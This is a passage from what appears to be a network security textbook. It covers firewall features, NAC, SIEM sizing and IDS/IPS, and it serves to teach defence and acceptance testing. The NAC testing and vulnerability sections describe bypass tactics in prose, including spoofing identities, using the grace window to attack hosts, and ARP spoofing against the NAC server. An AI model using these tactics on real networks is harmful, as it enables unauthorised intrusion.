signatures to detect vulnerability exploits.
 Protocol anomaly-based protection detects non-RFC compliant protocol usage such as the use
of overlong URI or overlong FTP login.
 Stateful pattern matching detects attacks across more than one packet, taking into account
elements such as the arrival order and sequence.
 Statistical anomaly detection prevents rate-based D.o.S flooding attacks.
 Heuristic-based analysis detects anomalous packet and traffic patterns such as port scans and
host sweeps.
 Custom vulnerability or spyware phone home signatures that can be used in the either the anti-
spyware or vulnerability protection profiles.
 Other attack protection capabilities such as blocking invalid or malformed packets, IP
defragmentation and TCP reassembly are utilized for protection against evasion and
obfuscation methods employed by attackers.
Traffic is normalized to eliminate invalid and malformed packets, while TCP reassembly and IP de-
fragmentation is performed to ensure the utmost accuracy and protection despite any attack evasion
techniques.
URL Filtering
Complementing the threat prevention and application control capabilities is a fully integrated, URL
filtering database consisting of 20 million URLs across 76 categories that enables IT departments to
monitor and control employee web surfing activities. The on-box URL database can be augmented to
suit the traffic patterns of the local user community with a custom, 1 million URL database. URLs that
218 | P a g e
are not categorized by the local URL database can be pulled into cache from a hosted, 180 million
URL database.
In addition to database customization, administrators can create custom URL categories to further
tailor the URL controls to suit their specific needs. URL filtering visibility and policy controls can be
tied to specific users through the transparent integration with enterprise directory services (Active
Directory, LDAP, eDirectory) with additional insight provided through customizable reporting and
logging.
File and Data Filtering
Data filtering features enable administrators to implement policies that will reduce the risks associated
with the transfer of unauthorized files and data.
 File blocking by type: Control the flow of a wide range of file types by looking deep within the
payload to identify the file type (as opposed to looking only at the file extension).
 Data filtering: Control the transfer of sensitive data patterns such as credit card and social
security numbers in application content or attachments.
 File transfer function control: Control the file transfer functionality within an individual
application, allowing application use yet preventing undesired inbound or outbound file
transfer.
Checkpoint R75 – Application Control Blade
Granular application control
 Identify, allow, block or limit usage of thousands of applications by user or group
 UserCheck technology alerts users about controls, educates on Web 2.0 risks, policies
219 | P a g e
 Embrace the power of Web 2.0 Social Technologies and applications while protecting
against threats and malware
Largest application library with AppWiki
 Leverages the world's largest application library with over 240,000 Web 2.0 applications
and social network widgets
 Identifies, detects, classifies and controls applications for safe use of Web 2.0 social
technologies and communications
 Intuitively grouped in over 80 categories—including Web 2.0, IM, P2P, Voice & Video
and File Share
Integrated into Check Point Software Blade Architecture
 Centralized management of security policy via a single console
 Activate application control on any Check Point security gateway
 Supported gateways include: UTM-1, Power-1, IP Appliances and IAS Appliances
Main Functionalities
 Application detection and usage control
 Enables application security policies to identify, allow, block or limit usage of thousands
of applications, including Web 2.0 and social networking, regardless of port, protocol or
evasive technique used to traverse the network.
 AppWiki application classification library
 AppWiki enables application scanning and detection of more than 4,500 distinct
applications and over 240,000 Web 2.0 widgets including instant messaging, social
networking, video streaming, VoIP, games and more.
 Inspect SSL Encrypted Traffic
 Scan and secure SSL encrypted traffic passing through the gateway, such as HTTPS.
 UserCheck
 UserCheck technology alerts employees in real-time about their application access
limitations, while educating them on Internet risk and corporate usage policies.
 User and machine awareness
 Integration with the Identity Awareness Software Blade enables users of the Application
Control Software Blade to define granular policies to control applications usage.
 Central policy management
 Centralized management offers unmatched leverage and control of application security
policies and enables organizations to use a single repository for user and group
definitions, network objects, access rights and security policies.
 Unified event management
 Using SmartEvent to view user’s online behavior and application usage provides
organizations with the most granular level of visibility.
220 | P a g e
Utilizing Firewalls for Maximum Security
1. Don’t use an old, non-application aware firewall
2. First Firewall rule must be deny all protocols on all ports from all IPs to all IPs
3. Only rules of requires systems must be allowed. For example:
a. HTTP, HTTPS – to all
b. IMAPS to internal mail server
c. NetBIOS to internal file server and etc…
4. Activate Application inspection on all traffic on all ports
5. Enforce that only the defined traffic types would be allowed on that port. For Example
on port 80 only identified HTTP traffic would be allowed.
6. Don’t allow forwarding of any traffic that was failed to be inspected.
7. Define the DNS server as the Domain Controller, do not allow recursive/authoritative
DNS requests make sure the firewall inspects in STRICT mode that the Domain
Controller’s outgoing DNS requests.
8. Active Egress filtering to avoid sending spoofed packets unknowingly and unwillingly
participating in DDOS attacks.
Implementing a Back-Bone Application-Aware Firewall
Implementing a Back-Bone Application-Aware Firewall is the perfect, security solution for
absolute network management.
The best configuration is:
1. Combining full Layer 2 security in Switches and Router equipment
2. Diving all of the organization devices into VLANs which represents the organization’s
Logical groups
3. Implementing each port in each one of the VLANs as PVLAN Edge, which no endpoint
can talk with any other endpoint via Layer 2.
4. Defining all routers to forward all traffic to the firewall (their higher level hop)
5. Placing an application aware firewall as the backbone before the backbone router
Network Inventory & Monitoring
How to map your network connections?
1. Since the every day’s IT management has many tasks, no one really inspects what are the
current open connections.
2. It is possible to configure the firewall to log every established TCP connection and every
host which sent any packet (ICMP, UDP) to any non-TCP port.
221 | P a g e
3. The results of such configuration would be a list of unknown IPs. It is possible to write an
automatic script to execute a Reverse-DNS lookup and an IP WHOIS search on each IP
and create a “resolved list” which has some meaning to it.
4. Anything unknown/unfamiliar IP accessed from within the network, requires to match the
number of stations which accessed it and to make a basic forensic investigation on them
in order to discover the software which made the connection.
5. This process is very technical, time consuming, requires especially skilled security
professionals and therefore is not executed unless a Security Incident was reported.
6. The only solution that reverses this process from being impossible to very reasonable and
simple is IP/Domain/URL whitelisting, which denies everything except the database of
the entire world’s known, well reputed and malware clean approved IPs/Websites.
7. IP/Domain/URL whitelisting is very hard to implement and requires a high amount of
maintenance, it is up to you to make your choice.
How to discover all network devices?
1. Mapping of the network is provided by Firewalls, Anti-Viruses, NACs, SIEM and
Configuration Management products.
2. Some products include an agent that runs on the endpoint, acts as a network sensor and
reports all the machines that passively or actively communicated on its subnet.
3. It is possible to purchase a “Network Inventory Management” solution.
The most reliable way to detect all machines on the network is to combine:
1. The switches know all the ports that have electric power signal and know all the devices
MACs if they ever sent a non-spoofed layer 2 frame on that port.
2. Connect via SNMP to switches and extract all MACs and IPs on all ports
3. Full network TCP and UDP scan of ports 1 to 65535 of the entire network (without any
ping or is-alive scans). If there is a hidden machine that is listening on a self-defined IP
on a specific TCP/UDP port, it will answer at least one packet and will be detected by the
scan.
Detecting “Hidden” Machines – Machines behind a NAT INSIDE Your Network
1. Looking for timing anomalies in ICMP and TCP
2. Looking for IP ID strangeness
a. NAT with Windows on a Linux host might have non-incremental IPID packets,
interspersed with incremental IPID packets
3. Looking for unusual headers in packets
a. Timestamps and other optional parameters may have inherent patterns
How to discover all cross-network installed software?
There are two most common ways to discover the software installed on the networks machines:
222 | P a g e
1. Agent-Less – discovery is done by connecting to the machine remotely through:
a. RPC/WMI
b. SNMP
On windows systems, WMI provides most of the classical functionality, though it only
detects software installed by “Windows Installer” and software registered in the
“Uninstall” registry Key.
Some machines can’t bet “managed”/connected to remotely over the network since:
1. They have a firewall installed or configured to block WMI/RPC access
2. They have a permission error, “Domain Administrator” removed from the “Local
Administrators” group
3. They are not part of the domain – they were never reported and registered
2. Agent-Based – provides the maximum level of discovery, can scan the memory, raw disk,
files, folders locally and report back all of the detected software.
Once the agent is installed, most of the common permission, firewalls, and connectivity
and latency problems are solved.
The main problem is machines the agent was removed from and stranger machines which
never had the agent installed.
3. The Ultimate Solution – Combining agent-based with agent-less technology, this way all
devices get detected and most of the possible information is extracted from them.
NAC
The Problem: Ethernet Network
 Authenticate (Who):
o distinguish between valid or rouge member
 Control (Where to and How?):
o all network members at the network level
 Authorize (Application Layer Conditions):
o check device compliance according to company policy
223 | P a g e
What is a NAC originally?
 The concept was invented in 2003 originally called “Network Admission Control”
 The idea: checking the software version on machines connecting to the network
 The Action: denying connection for those below the standard
Today’s NAC?
 Re-Invented as: Network Access Control
 Adding to the old idea: Disabling ANY foreign machines from connecting into a
computer network
 The Actions:
o Shuts down the power on that port of the switch
o Move foreign machine to Guest VLAN
Why Invent Today’s NAC?
224 | P a g e
Dynamic Solution for a Dynamic Environment
Did We EVER Manage Who Gets IP Access?
What is a NAC?
Network Access Control (NAC) is a computer networking solution that uses a set of protocols to
define and implement a policy that describes how to secure access to network nodes by devices
when they initially attempt to access the network. NAC might integrate the automatic remediation
process (fixing non-compliant nodes before allowing access) into the network systems, allowing
225 | P a g e
the network infrastructure such as routers, switches and firewalls to work together with back
office servers and end user computing equipment to ensure the information system is operating
securely before interoperability is allowed.
Network Access Control aims to do exactly what the name implies—control access to
a network with policies, including pre-admission endpoint security policy checks and post-
admission controls over where users and devices can go on a network and what they can do.
Initially 802.1X was also thought of as NAC. Some still consider 802.1X as the simplest form of
NAC, but most people think of NAC as something more.
Simple Explanation
When a computer connects to a computer network, it is not permitted to access anything unless it
complies with a business defined policy, including anti-virus protection level, system update level
and configuration.
While the computer is being checked by a pre-installed software agent, it can only access
resources that can remediate (resolve or update) any issues. Once the policy is met, the computer
is able to access network resources and the Internet, within the policies defined within the NAC
system.
NAC is mainly used for endpoint health checks, but it is often tied to Role based Access. Access
to the network will be given according to profile of the person and the results of a posture/health
check. For example, in an enterprise, the HR department could access only HR department files if
both the role and the endpoint meet anti-virus minimums.
Goals of NAC
Because NAC represents an emerging category of security products, its definition is both
evolving and controversial.
The overarching goals of the concept can be distilled to:
1. Mitigation of zero-day attacks
The key value proposition of NAC solutions is the ability to prevent end-stations that lack
antivirus, patches, or host intrusion prevention software from accessing the network and
placing other computers at risk of cross-contamination of computer worms.
2. Policy enforcement
NAC solutions allow network operators to define policies, such as the types of computers
or roles of users allowed to access areas of the network, and enforce them in switches,
routers, and network middle boxes.
226 | P a g e
3. Identity and access management
Where conventional IP networks enforce access policies in terms of IP addresses, NAC
environments attempt to do so based on authenticated user identities, at least for user end-
stations such as laptops and desktop computers.
NAC Approaches
 Agent-Full
o Smarter, Unlimited Features
o Faster
o Works Offline (Settings Cache Mode)
o Endpoint Management Itself is more secure
 Agent-Less
o Modular
o Easy to integrate
o Credentials constantly travel the network
o SNMP Traps and DHCP Requests
227 | P a g e
NAC – Behavior Lifecycle
NAC = LAN Mini IPS?
 NAC is one of the functions that a full end to end IPS product should provide
 Some vendors don’t sell NAC as a proprietary module, for example:
o ForeScout CounterAct
 NAC only Solutions by
o Trustwave
o Mcafee
NAC as Part of Endpoint Security Solutions
 Antivirus Vendors provide NAC (Network Admission Control) on managed endpoints
 Vendors like Symantec, Mcafee and Sophos
 A great solution IF:
o The AV Management server controls the switches and disconnects all non-
managed hosts
o Except exclusions (Printers, Cameras, Physical Access Devices)
Talking Endpoints: What’s a NAP?
 NAP is Microsoft’s built-in support client for NAC
 NAP interoperates with every switch and access point
 Controlled by Group Policy
228 | P a g e
General Basic NAC Deployment
NAC Deployment Types:
1. Pre-admission and post-admission
There are two prevailing design philosophies in NAC, based on whether policies are
enforced before or after end-stations gain access to the network. In the former case,
called pre-admission NAC, end-stations are inspected prior to being allowed on the
network. A typical use case of pre-admission NAC would be to prevent clients with out-
of-date antivirus signatures from talking to sensitive servers. Alternatively, post-
admission NAC makes enforcement decisions based on user actions, after those users
have been provided with access to the network.
2. Agent versus agentless
The fundamental idea behind NAC is to allow the network to make access control
decisions based on intelligence about end-systems, so the manner in which the network is
informed about end-systems is a key design decision. A key difference among NAC
systems is whether they require agent software to report end-system characteristics, or
229 | P a g e
whether they use scanning and network inventory techniques to discern those
characteristics remotely.
As NAC has matured, Microsoft now provides their network access protection
(NAP) agent as part of their Windows 7, Vista and XP releases. There are NAP
compatible agents for Linux and Mac OS X that provide near equal intelligence for these
operating systems.
3. Out-of-band versus inline
In some out-of-band systems, agents are distributed on end-stations and report
information to a central console, which in turn can control switches to enforce policy. In
contrast the inline solutions can be single-box solutions which act as internal firewalls
for access-layer networks and enforce the policy. Out-of-band solutions have the
advantage of reusing existing infrastructure; inline products can be easier to deploy on
new networks, and may provide more advanced network enforcement capabilities,
because they are directly in control of individual packets on the wire. However, there are
products that are agentless, and have both the inherent advantages of easier, less risky
out-of-band deployment, but use techniques to provide inline effectiveness for non-
compliant devices, where enforcement is required.
NAC Acceptance Tests
1. Attempting to get an IP using DHCP in a regular Windows machine.
2. Attempting to get an IP using DHCP in a regular Linux machine.
230 | P a g e
3. Multiple attempts to get an IP using DHCP with a private DHCP client with different values
then the Operating Systems in the DHCP packet fields
4. Manually configuring a local IP of type “Link-Local”
5. Manually configuring an IP in the network’s IP range with “Gratuitous ARP” on
6. Manually configuring an IP in the network’s IP range with “Gratuitous ARP” off
7. Inspecting the NAC’s response to DHCP attacks and network attacks in the “1-2 minutes of
grace”
8. Restricting the WMI (RPC) support on the local machine (even using a firewall to block RPC
on TCP port 135)
9. Copy-Catting/Stealing the identity (IP or IP+MAC) of an existing user (received via passive
network sniffing of broadcasts)
10. Using private Denial of Service 0-day exploits in a loop on a specific machine to obtain its
identity on the network
11. Imposing as a printer or other non-smart devices (printers, biometric devices, turnstile
controller, door devices and etc…)
12. Testing the proper enforcement common NAC basic protection features such as:
 Duplicate MAC
 Duplicate IP
 Foreign MAC
 Foreign IP
 Wake Up On LAN
 Domain Membership
 Anti-Virus + Definitions
NAC Vulnerabilities
Attack a NAC is mostly based on network attacks and focuses on several aspects:
 Vulnerabilities by Integration Process - Wrong product positioning in the network
architecture, wrong design of the data flow which results in different levels of security.
These mistakes are caused mostly by the following reasons:
o Integrator’s Lack of understanding of the organization’s requirements, systems
and network architecture
o Integrator’s Lack of understanding of the organization’s security policies and its
expectations from the product
231 | P a g e
o Insufficient involvement of the organization’s IT personnel in the integration
process
o Lack of security auditing to determine the product real-life performance by a
certified information security professional
 Vulnerabilities caused by configuration –Wrong configuration of the functionalities the
product enforces within the organization, such as:
o Not enforcing/monitoring lab/development environments
o Not enforcing /monitoring different VLANs and networks, such as the VoIP
network
o Not blocking/monitoring non-interactive network sniffing modes such as Wake
Up On LAN
o Not analyzing and responding to anomalies in relevant element/protocols,
insufficient network lock-out times,
 Vulnerabilities in the product (Vendor’s Code )
The common attack – Bypassing & Killing the NAC
1. Some of today’s NACs are event based, so the network equipment (switch/router) allows
you to connect to the network and get an IP, but sometime after you connected to the
network, it sends a message notifying the NAC with your IP and MAC and the NAC tries
to connect to your machine and validate it is an approved member of the network..
2. The alerting mechanism from the switches in mostly SNMP alerts called “SNMP Traps”.
3. This behavior grants the attacker one-two minutes to attack/take over/infect some
machines on the network, before his port’s power is disconnected.
4. In most cases after 5 minutes if the port is shut down, the NAC wakes it back to life in
order to keep the organization operable and to accept new devices.
5. For a well prepared hacker, with automatic scripts exploiting most common
vulnerabilities and utilizing the latest exploits, this would be sufficient.
6. The real problem is that a large amount of the NAC vendors provide a product with is
software based and therefore is installed mostly on common Windows or Linux
Machines.
7. As it is well known, common Windows and Linux machines are vulnerable to many
application layer and operating system vulnerabilities, but the absolute whole of them is
vulnerable to network attacks, especially layer 2 attacks.
8. This means that on those 1 or 2 minutes which are available every 5 minutes which
comes out to 5 to 10 minutes per hour, the attacker can find the Windows/Linux machine
hosting the NAC software and kill the communication to it using basic layer 2 attacks
such as ARP Spoofing.
232 | P a g e
Open Source Solutions
 OpenNac/FreeNAC
 PacketFence
OpenNAC/FreeNAC – Keeping It Simple
233 | P a g e
234 | P a g e
PacketFence – Almost Commercial Quality
235 | P a g e
236 | P a g e
237 | P a g e
238 | P a g e
SIEM - (Security Information Event
Management)
SIEM aka “SIM” (Security Information Management) and “SEM” (Security Event Management) solutions
are a combination of the formerly disparate product categories of SIM (security information management)
and SEM (security event management). SIEM technology provides real-time analysis of security alerts
generated by network hardware and applications. SIEM solutions come as software, appliances or managed
services, and are also used to log security data and generate reports for compliance purposes.
The acronyms SEM, SIM and SIEM have been used interchangeably, though there are differences in
meaning and product capabilities. The segment of security management that deals with real-time
monitoring, correlation of events, notifications and console views is commonly known as Security Event
Management (SEM). The second area provides long-term storage, analysis and reporting of log data and is
known as Security Information Management (SIM).
The term Security Information Event Management (SIEM), coined by Mark Nicolett and Amrit Williams
of Gartner in 2005, describes the product capabilities of gathering, analyzing and presenting information
from network and security devices; identity and access management
applications; vulnerability management and policy compliance tools; operating system, database and
application logs; and external threat data. A key focus is to monitor and help manage user and service
privileges, directory services and other system configuration changes; as well as providing log auditing and
review and incident response.
As of January 2012, Mosaic Security Research identified 85 unique SIEM products.
SIEM Capabilities
 Data Aggregation: SIEM/LM (log management) solutions aggregate data from many sources,
including network, security, servers, databases, applications, providing the ability to consolidate
monitored data to help avoid missing crucial events.
 Correlation: looks for common attributes, and links events together into meaningful bundles. This
technology provides the ability to perform a variety of correlation techniques to integrate different
sources, in order to turn data into useful information.
 Alerting: the automated analysis of correlated events and production of alerts, to notify recipients of
immediate issues.
 Dashboards: SIEM/LM tools take event data and turn it into informational charts to assist in seeing
patterns, or identifying activity that is not forming a standard pattern.
 Compliance: SIEM applications can be employed to automate the gathering of compliance data,
producing reports that adapt to existing security, governance and auditing processes.
 Retention: SIEM/SIM solutions employ long-term storage of historical data to facilitate correlation of
data over time, and to provide the retention necessary for compliance requirements.
239 | P a g e
SIEM Architecture
 Low level, real-time detection of known threats and anomalous activity (unknown
threats)
 Compliance automation
 Network, host and policy auditing
 Network behavior analysis and situational behavior
 Log Management
 Intelligence that enhances the accuracy of threat detection
 Risk oriented security analysis
 Executive and technical reports
 A scalable high performance architecture
240 | P a g e
A SIEM Detector Module is Comprised a few main Modules:
1. Detector
 Intrusion Detection
 Anomaly Detection
 Vulnerability Detection
 Discovery, Learning and Network Profiling systems
 Inventory systems
2. Collector
 Connectors to Windows Machines
 Connectors to Linux Machines
 Connectors to Network Devices
 Classifies the information and events
 Normalizes the information
3. SIEM
 Risk Assessment
 Correlation
241 | P a g e
 Risk metrics
 Vulnerability scanning
 Data mining for events
 Real-time monitoring
4. Logger
 Stores the data in the filesystem/DB
 Allows storage of unlimited number of events
 Supports SAN/NAS storage
5. Management Console & Dashboard
 Configuration changes
 Access to Dashboard and Metrics
 Multi-tenant and Multi-user management
 Access to Real-time information
 Reports generation
 Ticketing system
 Vulnerability Management
 Network Flows Management
 Reponses configuration
A SIEM Detector Module is Comprised of Sensors:
 Intrusion Detection
 Anomaly Detection
 Vulnerability Detection
 Discovery, Learning and Network Profiling systems
 Inventory systems
A SIEM Commonly used Open Source Sensors:
1. Snort (Network Intrusion Detection System)
2. Ntop (Network and usage Monitor)
3. OpenVAS (Vulnerability Scanning)
4. P0f (Passive operative system detection)
5. Pads (Passive Asset Detection System)
6. Arpwatch (Ethernet/IP address parings monitor)
7. OSSEC (Host Intrusion Detection System)
8. Osiris (Host Integrity Monitoring)
9. Nagios (Availability Monitoring)
10. OCS (Inventory)
242 | P a g e
SIEM Logics
243 | P a g e
Planning for the right amounts of data
Introduction
Critical business systems and their associated technologies are typically held to performance
benchmarks. In the security space, benchmarks of speed, capacity and accuracy are common for
encryption, packet inspection, assessment, alerting and other critical protection technologies. But
how do you set benchmarks for a tool based on collection, normalization and correlation of
security events from multiple logging devices? And how do you apply these benchmarks to
today’s diverse network environments?
This is the problem with benchmarking Security Information Event Management (SIEM)
systems, which collect security events from one to thousands of devices, each with its own
different log data format. If we take every conceivable environment into consideration, it is
impossible to benchmark SIEM systems. We can, however, set one baseline environment against
which to benchmark and then include equations so that organizations can extrapolate their own
benchmark requirements.
Consider that network and application firewalls, network and host Intrusion Detection/Prevention
(IDS/IPS), access controls, sniffers, and Unified Threat Management systems (UTM)—all log
security events that must be monitored. Every switch, router, load balancer, operating system,
server, badge reader, custom or legacy application, and many other IT systems across the
enterprise, produce logs of security events, along with every new system to follow (such as
virtualization). Most have their own log expression formats. Some systems, like legacy
applications, don’t produce logs at all.
First we must determine what is important. Do we need all log data from every critical system in
order to perform security, response, and audit? Will we need all that data at lightning speed?
(Most likely, we will not.) How much data can the network and collection tool actually handle
under load? What is the threshold before networks bottleneck and/or the SIEM is rendered
unusable, not unlike a denial of service (DOS)? These are variables that every organization must
consider as they hold SIEM to standards that best suit their operational goals.
Why is benchmarking SIEM important? According to the National Institute of Standards (NIST),
SIEM software is a relatively new type of centralized logging software compared to syslog. Our
SANS Log Management Survey shows 51 percent of respondents ranked collecting logs as their
most critical challenge – and collecting logs is a basic feature a SIEM system can provide.
Further, a recent NetworkWorld article explains how different SIEM products typically integrate
well with selected logging tools, but not with all tools. This is due to the disparity between
logging and reporting formats from different systems. There is an effort under way to standardize
logs through MITRE’s Common Event Expression (CEE) standard event log language.
244 | P a g e
But until all logs look alike, normalization is an important SIEM benchmark, which is measured
in events per second (EPS).
Event performance characteristics provide a metric against which most enterprises can judge a
SIEM system. The true value of a SIEM platform, however, will be in terms of Mean Time To
Remediate (MTTR) or other metrics that can show the ability of rapid incident response to
mitigate risk and minimize operational and financial impact. In our second set of benchmarks for
storage and analysis, we have addressed the ability of SIEM to react within a reasonable MTTR
rate to incidents that require automatic or manual intervention.
Because this document is a benchmark, it does not cover the important requirements that cannot
be benchmarked, such as requirements for integration with existing systems (agent vs. agent-less,
transport mechanism, ports and protocols, interface with change control, usability of user
interface, storage type, integration with physical security systems, etc.). Other requirements that
organizations should consider but aren’t benchmarked include the ability to process connection-
specific flow data from network elements, which can be used to further enhance forensic and root-
cause analysis.
Other features, such as the ability to learn from new events, make recommendations and store
them locally, and filter out incoming events from known infected devices that have been sent to
remediation, are also important features that should be considered, but are not benchmarked here.
Variety and type of reports available, report customization features, role-based policy
management and workflow management are more features to consider as they apply to an
individual organization’s needs but are not included in this benchmark. In addition, organizations
should look at a SIEM tool’s overall history of false positives, something that can be
benchmarked, but is not within the scope of this paper. In place of false positives, Table 2
focuses on accuracy rates within applicable categories. These and other considerations are
included in the following equations, sample EPS baseline for a medium-sized enterprise, and
benchmarks that can be applied to storage and analysis. As appendices, we’ve included a device
map for our sample network and a calculation worksheet for organizations to use in developing
their own EPS benchmarks.
SIEM Benchmarking Process
The matrices that follow are designed as guidelines to assist readers in setting their own
benchmark requirements for SIEM system testing. While this is a benchmark checklist, readers
must remember that benchmarking, itself, is governed by variables specific to each organization.
For a real-life example, consider an article in eSecurity Planet, in which Aurora Health in
Michigan estimated that they produced 5,000–10,000 EPS, depending upon the time of day.
We assume that means during the normal ebb and flow of network traffic. What would that load
look like if it were under attack? How many security events would an incident, such as a virus
outbreak on one, two or three subnets, produce?
245 | P a g e
An organization also needs to consider their devices. For example, a Nokia high-availability
firewall is capable of handling more than 100,000 connections per second, each of which could
theoretically create a security event log. This single device would seem to imply a need for
100,000 minimum EPS just for firewall logs. However, research shows that SIEM products
typically handle 10,000–15,000 EPS per collector.
Common sense tells us that we should be able to handle as many events as ALL our devices could
simultaneously produce as a result of a security incident. But that isn’t a likely scenario, nor is it
practical or necessary. Aside from the argument that no realistic scenario would involve all
devices sending maximum EPS, so many events at once would create bottlenecks on the network
and overload and render the SIEM collectors useless. So, it is critical to create a methodology for
prioritizing event relevance during times of load so that even during a significant incident, critical
event data is getting through, while ancillary events are temporarily filtered.
Speed of hardware, NICs (network interface cards), operating systems, logging configurations,
network bandwidth, load balancing and many other factors must also go into benchmark
requirements. One may have two identical server environments with two very different EPS
requirements due to any or all of these and other variables. With consideration of these variables,
EPS can be established for normal and peak usage times. We developed the equations included
here, therefore, to determine Peak Events (PE) per second and to establish normal usage by
exchanging the PEx for NEx (Normal Events per second).
List all of the devices in the environment expected to report to the SIEM. Be sure to consider any
planned changes, such as adding new equipment, consolidating devices, or removing end of life
equipment. First, determine the PE (or NE) for each device with these steps:
1. Carefully select only the security events intended to be collected by the SIEM. Make
sure those are the only events included in the sample being used for the formula.
2. Select reasonable time frames of known activity: Normal and Peak (under attack, if
possible). This may be any period from minutes to days. A longer period of time, such
as a minimum of 90 days, will give a more accurate average, especially for “normal”
activity.
Total the number of Normal or Peak events during the chosen period. (It will also be
helpful to consider computing a “low” activity set of numbers, because fewer events may
be interesting as well.)
3. Determine the number of seconds within the time frame selected.
4. Divide the number of events by the number of seconds to determine PE or NE for the
selected device.
Formula 1:
# of Security Events = EPS Time Period in Seconds
246 | P a g e
1. The resulting EPS is the PE or NE depending upon whether we began with peak activity
or normal activity. Once we have completed this computation for every device needing
security information event management, we can insert the resulting numbers in the
formula below to determine Normal EPS and Peak EPS totals for a benchmark
requirement.
Formula 2:
1. In your production environment determine the peak number of security events (PEx)
created by each device that requires logging using Formula1. (If you have identical
devices with identical hardware, configurations, load, traffic, etc., you may use this
formula to avoid having to determine PE for every device):
2. [PEx (# of identical devices)]
Sum all PE numbers to come up with a grand total for your environment
3. 3. Add at least 10% to the Sum for headroom and another 10% for growth.
So, the resulting formula looks like this:
Step 1: (PE1+PE2+PE3...+ (PE4 x D4) + (PE5 x D5)...) = SUM1 [baseline PE]
Step 2: SUM1 + (SUM1 x 10%) = SUM2 [adds 10% headroom]
Step 3: SUM2 + (SUM2 x 10%) = Total PE benchmark requirement [adds 10% growth
potential]
Once these computations are complete, the resulting Peak EPS set of numbers will reflect that
grand, but impractical, peak total mentioned above. Again, it is unlikely that all devices will ever
simultaneously produce log events at maximum rate. Seek consultation from SMEs and the
system engineers provided by the vendor in order to establish a realistic Peak EPS that the SIEM
system must be able to handle, and then set filters for getting required event information through
to SIEM analysis, should an overload occur.
We have used these equations to evaluate a hypothetical mid-market network with a set number
of devices. If readers have a similar infrastructure, similar rates may apply. If the organization is
different, the benchmark can be adjusted to fit organizational infrastructures using our equations.
The Baseline Network
A mid-sized organization is defined as having 500–1000 users, according to a December guide by
Gartner, Inc., titled “Gartner’s New SMB Segmentation and Methodology.” Gartner Principal
Analyst Adam Hils, together with a team of Gartner analysts, helped us determine that a 750–
1000 user organization is a reasonable base point for our benchmark. As Hils puts it, this number
represents some geo and technical diversity found in large enterprises without being too complex
to scope and benchmark.
With Gartner’s advice, we set our hypothetical organization to have 750 employees, 750 user end
points, five offices, six subnets, five databases, and a central data center. Each subnet will have
247 | P a g e
an IPS, a switch and gateway/router. The data center has four firewalls and a VPN. (See the
matrix below and Appendix A, “Baseline Network Device Map,” for more details.)
Once the topography is defined, the next stage is to average EPS collected from these devices
during normal and peak periods. Remember that demanding all log data at the highest speed
24x7 could, in it, become problematic, causing a potential DOS situation with network or SIEM
system overload. So realistic speeds based on networking and SIEM product restrictions must
also be considered in the baseline.
Protocols and data sources present other variables considered determining average and peak load
requirements. In terms of effect on EPS rates, our experience is that systems using UDP can
generate more events more quickly, but this creates a higher load for the management tool, which
actually slows collection and correlation when compared to TCP. One of our reviewing analysts
has seen UDP packets dropped at 3,000 EPS, while TCP could maintain a 100,000 EPS load. It’s
also been our experience that use of both protocols in single environment. Table 1, “Baseline
Network Device EPS Averages,” provides a breakdown of Average, Peak and Averaged Peak
EPS for different systems logs are collected from. Each total below is the result of device
quantity (column 1) x EPS calculated for the device. For example, 0.60 Average EPS for Cisco
Gateway/Routers has already been multiplied by the quantity of 7 devices. So the EPS per single
device is not displayed in the matrix, except when the quantity is 1.
To calculate Average Peak EPS, we determined two subnets under attack, with affected devices
sending 80 percent of their EPS capacity to the SIEM. These numbers are by no means scientific.
But they do represent research against product information (number of events devices are capable
of producing), other research, and the consensus of expert SANS Analysts contributing to this
paper.
248 | P a g e
A single security incident, such as a quickly replicating worm in a subnet, may fire off thousands
of events per second from the firewall, IPS, router/switch, servers, and other infrastructure at a
single gateway. What if another subnet falls victim and the EPS are at peak in two subnets?
Using our baseline, such a scenario with two infected subnets representing 250 infected end
points could theoretically produce 8,119 EPS.
We used this as our Average Peak EPS baseline because this midline number is more
representative of a serious attack on an organization of this size. In this scenario, we still have
event information coming from servers and applications not directly under attack, but there is
potential impact to those devices. It is important, therefore, that these normal logs, which are
useful in analysis and automatic or manual reaction, continue to be collected as needed.
249 | P a g e
SIEM Storage and Analysis
Now that we have said so much about EPS, it is important to note that no one ever analyzes a
single second’s worth of data. An EPS rating is simply designed as a guideline to be used for
evaluation, planning and comparison. When designing a SIEM system, one must also consider
the volume of data that may be analyzed for a single incident. If an organization collects an
average of 20,000 EPS
over eight hours of an ongoing incident, that will require sorting and analysis of 576,000,000 data
records. Using a 300 byte average size, that amounts to 172.8 gigabytes of data. This
consideration will help put into perspective some reporting and analysis baselines set in the below
table. Remember that some incidents may last for extended periods of time, perhaps tapering off,
then spiking in activity at different points during the attack.
While simple event performance characteristics provide a metric against which most enterprises
can judge a SIEM, as mentioned earlier, the ultimate value of a well-deployed SIEM platform
will be in terms of MTTR (Mean “Time To Remediate”) or other metrics that can equate rapid
incident response to improved business continuity and minimal operational/fiscal impact.
It should be noted in this section, as well, that event storage may refer to multiple data facilities
within the SIEM deployment model. There is a local event database, used to perform active
investigations and forensic analysis against recent activities; long-term storage, used as an archive
of summarized event information that is no longer granular enough for comprehensive forensics;
and read/only and encrypted raw log storage, used to preserve the original event for forensic
analysis and nonrepudiation—guaranteeing chain of custody for regulatory compliance.
250 | P a g e
251 | P a g e
Baseline Network Device Map
This network map is the diagram for our sample network. Traffic flow, points for collecting
and/or forwarding event data, and throttle points were all considered in setting the benchmark
baseline in Table 1.
252 | P a g e
EPS Calculation Worksheet
Common SIEM Report Types
1. Security SIEM DB
2. Logger DB
3. Alarms
4. Incidents
5. Vulnerabilities
6. Availability
7. Network Statistics
8. Asset Information and Inventory
9. Ticketing system
10. Network
253 | P a g e
Custom Reports
Defining the right Rules – It’s all about the rules
When it comes to a SIEM, it is all about the rules.
The SIEM can be configured to be most effective and produce the best results by:
1. Defining the right rules that define “what is considered a security event/incident”
2. Implementing an automated response/mitigation action to stop it at real time
3. Configuring it to alert the right person for each incident - in real time
An example of a subset of a few events, which together represent a security incident:
1. Some IP on the internet does port scanning on the organization’s IP, port scan is detected
and logged
2. 10 days later, a machine from the internal network connects to that IP = Intrusion!
254 | P a g e
IDS/IPS
Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS),
are network security appliances that monitor network and/or system activities for malicious activity. The
main functions of intrusion prevention systems are to identify malicious activity, log information about said
activity, attempt to block/stop activity, and report activity.
Intrusion prevention systems are considered extensions of intrusion detection systems because they both
monitor network traffic and/or system activities for malicious activity. The main differences are, unlike
intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively
